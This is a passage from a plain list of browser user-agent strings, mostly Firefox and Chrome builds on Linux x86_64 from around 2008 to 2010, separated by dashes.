U; Linux x64_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86; es-ES; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64) Gecko/2008072820 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.04 (hardy) Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.11) Gecko/2009070611 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008090713 Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.7) Gecko/2009030620 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.1.10) Gecko/20100506 SUSE/3.5.10-0.1.1 Firefox/3.5.10 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1 -Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux x86_64; el-GR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 FirePHP/0.1.1.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 FirePHP/0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.5) Gecko/2008122010 Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc9 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 FirePHP/0.2.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.3 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.1 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.308.0 Safari/532.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.353.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.368.0 Safari/533.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.417.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.544.0 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.200 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.82 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.642.0 Chrome/10.0.642.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.127 Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 SUSE/10.0.626.0 (KHTML, like Gecko) Chrome/10.0.626.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.470.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/8.1.0.0 Safari/540.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) Gecko Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008061317 (Gentoo) Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062315 (Gentoo) Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062908 Firefox/3.0 (Debian-3.0~rc2-2) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008072820 Kubuntu/8.04 (hardy) Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008110312 Gentoo Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009060309 Linux Mint/7 (Gloria) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061417 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009070612 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.16) Gecko/2009121609 Firefox/3.0.6 (Windows NT 5.1) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.17) Gecko/2010011010 Mandriva/1.9.0.17-0.1mdv2009.1 (2009.1) Firefox/3.0.17 GTB6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 (Linux Mint) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.4) Gecko/2008120512 Gentoo Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121806 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121911 CentOS/3.0.5-1.el5.centos Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122014 CentOS/3.0.5-1.el4.centos Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122120 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122406 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-1.4 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020407 Firefox/3.0.4 (Debian-3.0.6-1) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020519 Ubuntu/9.04 (jaunty) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7 GTB5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030719 Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030810 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva/1.9.0.7-0.1mdv2009.0 (2009.0) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031802 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032319 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032606 Red Hat/3.0.7-1.el5 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1.1 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032713 Ubuntu/9.04 (jaunty) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032908 Gentoo Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009040312 Gentoo Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090630 Firefox/3.5 GTB6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Firefox/3.5.2 Slackware -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Slackware Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090914 Slackware/13.0_stable Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091114 Gentoo Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.6) Gecko/20100117 Gentoo Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100318 Gentoo Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8pre) Gecko/20091227 Ubuntu/9.10 (karmic) Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090312 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 GNU/Linux/x86_64 Firefox/3.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100305 Gentoo Firefox/3.5.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Gentoo Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101219 Gentoo Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101223 Gentoo Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100403 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.4) Gecko/20100614 Ubuntu/10.04 (lucid) Firefox/3.6.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 SUSE/3.6.8-0.1.1 Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090405 Firefox/3.6a1pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008011321 Firefox/3.0b3pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008020509 Firefox/3.0b3pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008031318 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008040813 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008041816 Fedora/3.0-0.55.beta5.fc9 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9pre) Gecko/2008042312 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061015 Ubuntu/8.04 (hardy) Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.4) Gecko/2008110510 Red Hat/3.0.4-1.el5_2 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; es-CL; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009072711 CentOS/3.0.12-1.el5.centos Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.7) Gecko/2009022800 SUSE/3.0.7-1.4 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc11 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; es-MX; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) 